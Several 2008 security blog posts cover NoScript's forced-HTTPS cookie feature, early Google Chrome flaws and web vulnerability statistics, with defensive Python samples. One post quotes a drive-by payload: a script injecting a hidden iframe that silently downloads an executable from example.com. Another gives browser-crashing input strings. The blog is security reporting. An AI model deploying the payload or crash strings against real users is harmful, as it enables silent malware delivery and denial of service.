Friday, September 19, 2008

NoScript vs SurfJacking

| Armando Romeo |
Giorgio has added a new special feature to the popular NoScript.

With the new version 1.8.13 it is now possible to force HTTPS on a (wildcard) list of websites, along with several other features regarding HTTPS safety.
This comes in handy for protecting against the SurfJacking attack demonstrated in practice by Sandro Gauci's tool.


Although Gmail solved the surf jacking issue, which could lead to cookie stealing through a sophisticated hijacking (an attacker on the same network forces the victim's browser to issue a plain HTTP request to the target site, and any session cookie not marked Secure travels in cleartext, ready to be sniffed), too many websites are still vulnerable to this kind of attack.

Now there's no additional work to do except provide a list of websites to NoScript and let it handle the protection for us, above all when we are in a hostile environment like an internet cafe or an open wifi connection.

Basically, NoScript adds the Secure flag to cookies on the fly, forcing the cookie to be sent only over HTTPS connections.
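
To make the mechanism concrete, here is a minimal Python sketch of the rewrite (this is not NoScript's actual code, which works inside Firefox's cookie handling; the cookie name and values are made up):

def force_secure_flag(set_cookie_value):
    # Append the Secure attribute to a Set-Cookie value if it is missing.
    # A browser never sends a cookie marked Secure over plain HTTP, so a
    # sniffer on an open wifi network cannot capture the session id.
    if "secure" not in set_cookie_value.lower():
        return set_cookie_value + "; Secure"
    return set_cookie_value

# A hypothetical session cookie as a vulnerable site would set it:
print(force_secure_flag("SID=abc123; Domain=.example.com; Path=/"))
# -> SID=abc123; Domain=.example.com; Path=/; Secure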

Very good. When will NoScript be embedded in Mozilla out of the box?

Anyway, this was a quick post. Time to fill in my encrypted-cookies website list...

Thursday, September 4, 2008

Google Chrome Silent File Download Exploit

| Armando Romeo |

As I said, my previous post was destined to be outdated very soon.

This is what appeared a few minutes ago on milw0rm and packetstorm:


<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0"></iframe>');
</script>

This script should (I haven't tested it yet, will do it later) trigger a silent download on the client machine.

Today Hackers Center's stats showed 13% of visitors using the new, still-raw browser.
This is a temporary peak, but still scary considering all the bugs found in less than 48 hours.


I think Google will soon regret this premature release.

Wednesday, September 3, 2008

Google Chrome vulnerabilities list

| Armando Romeo |

OK, the news is old: Google has released a new browser and the whole web is blogging about it. But my duty is to talk about security, so I'm not going to review Google Chrome's features but to list the vulnerabilities already found only 16 hours after the release. (I fear this post will be outdated in a few hours.)

Rishi Narang was the first, with a Denial of Service as simple as pie:

Just browse this page and place your mouse over the link below (make sure you bookmark this page first if you want to read on, though):

CRASH ME

Just "evil:%" in the anchor text is capable of crashing all the Chrome tabs (despite all the tabs are separated processes).

Someone has also reported that entering a very long bookmark may kill the browser. The length has not been given, but it's worth a try.

If your Chrome is still alive you may want to try entering

about@:

in the location bar.

The good thing is that the browser doesn't need Administrator rights to run.

Matt Cutts has stated on his blog that section 11 of the EULA will be updated. Yes, the section about you granting all rights to Google:

a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.

I'm worried about the enthusiastic reviews I see online.
The Google brand was enough to push an unfinished product up to 1% of the User-Agents seen on its very first day.
The risk is high, and the fuzzers are still crunching...

Monday, September 1, 2008

WhiteHat website vulnerabilities stats

| Armando Romeo |
WhiteHat Security showed some numbers based on stats collected from real-world assessments they carried out on 687 custom-code websites (so no "known" publicly available vulnerability stats here).

Jeremiah's webinar was quite interesting, and showing such numbers is not a common practice either.
So before any comments: kudos to Jeremiah.


The most interesting part of the stats is the breakdown of vulnerability types found, to which I wish to add my comments.


67% of sites suffer from Cross-site scripting
Not a big surprise here. I'd have expected even bigger numbers; the .NET framework's XSS prevention probably played some role.
XSS is still at the top of the OWASP Top 10. A lot of research has been done and a lot of discussion on XSS prevention is going on, but developers still fail to sanitize and encode input/output.

The only solution I see here is to prevent developers from writing buggy code through the use of robust frameworks, since years of tutorials, conferences and best practices don't seem to have worked.
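
To be concrete about what encoding means in practice, here is a minimal Python sketch (the function and page fragment are made up for illustration):

import html

def render_comment(comment):
    # Encode user-controlled data before writing it into the page, so that
    # injected markup is displayed as text instead of being executed.
    return "<p>" + html.escape(comment) + "</p>"

print(render_comment("<script>alert('xss')</script>"))
# -> <p>&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;</p>

Applied consistently by the framework rather than left to each developer, this one line of discipline kills most reflected XSS.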


17% of sites suffer from SQL Injection
SQL injection is easier to prevent. The remediation/development units of an organization tend to prioritize this kind of vulnerability because its danger feels more real compared to XSS.

An attack on the organization's data has more "emotional impact" on management and the executive units than XSS does.
XSS takes higher priority when it is persistent, anyway.

SQL injection prevention is also better understood from a remediation report: with prepared statements or proper input sanitization the vulnerability goes away.
Forcing developers to use prepared statements would drop this percentage to near zero.
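
For illustration, a minimal Python sketch of the difference (the table and data are hypothetical):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")

hostile = "x' OR '1'='1"  # classic injection attempt

# Vulnerable: string concatenation lets the input rewrite the query:
#   "SELECT name FROM users WHERE name = '" + hostile + "'"
# would return every row in the table.

# Safe: the prepared statement binds the value as pure data.
rows = conn.execute("SELECT name FROM users WHERE name = ?",
                    (hostile,)).fetchall()
print(rows)  # [] -- the injection attempt matches nothing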

As Jeremiah said, CSRF made its appearance in the stats for the first time.
But honestly speaking, the 8% figure for this vulnerability seemed suspicious to me.


Someone asked for more information on this before me.

Jeremiah says explicitly that these numbers are based on the effectiveness of the automated tools they use, and adds that the real number for CSRF approaches 75%.

This is what I thought at first indeed.

Right now all the companies are relying on automated tools that cannot cover the kinds of vulnerabilities that require manual testing to be discovered.
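
For context, the standard defense those tools should be verifying is a per-session anti-CSRF token. A rough Python sketch (the token store and function names are hypothetical):

import hmac
import os

session_tokens = {}  # session id -> expected token (hypothetical store)

def issue_token(session_id):
    # Embed this unguessable token in every form served to the user.
    token = os.urandom(16).hex()
    session_tokens[session_id] = token
    return token

def is_valid_post(session_id, submitted_token):
    # A forged cross-site request cannot read the victim's page, so it
    # cannot know the token and this check fails.
    expected = session_tokens.get(session_id, "")
    return hmac.compare_digest(expected, submitted_token or "")

A scanner can easily report whether such a token is present in a form, but confirming that the server actually validates it and binds it to the session usually takes a human.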

This is where the industry is stuck: relying on tools that are not able to catch them all (logic flaws included) while keeping manual testing to a minimum in order to keep fees low and win the competition.

Not that this is a sin of the security services vendors, but the 8% CSRF figure is a symptom of a commonly accepted failure of such tools.

Accepted by companies that cannot afford manual reviews (when those are feasible anyway), and accepted by security services providers who earn money with much less effort.

My question is: how could a tool have discovered a logic flaw like the latest big Joomla exploit?
Probably only a source code audit could have uncovered it. But who is auditing source code anymore when you have tools?
Smells like the old "false sense of security" here.
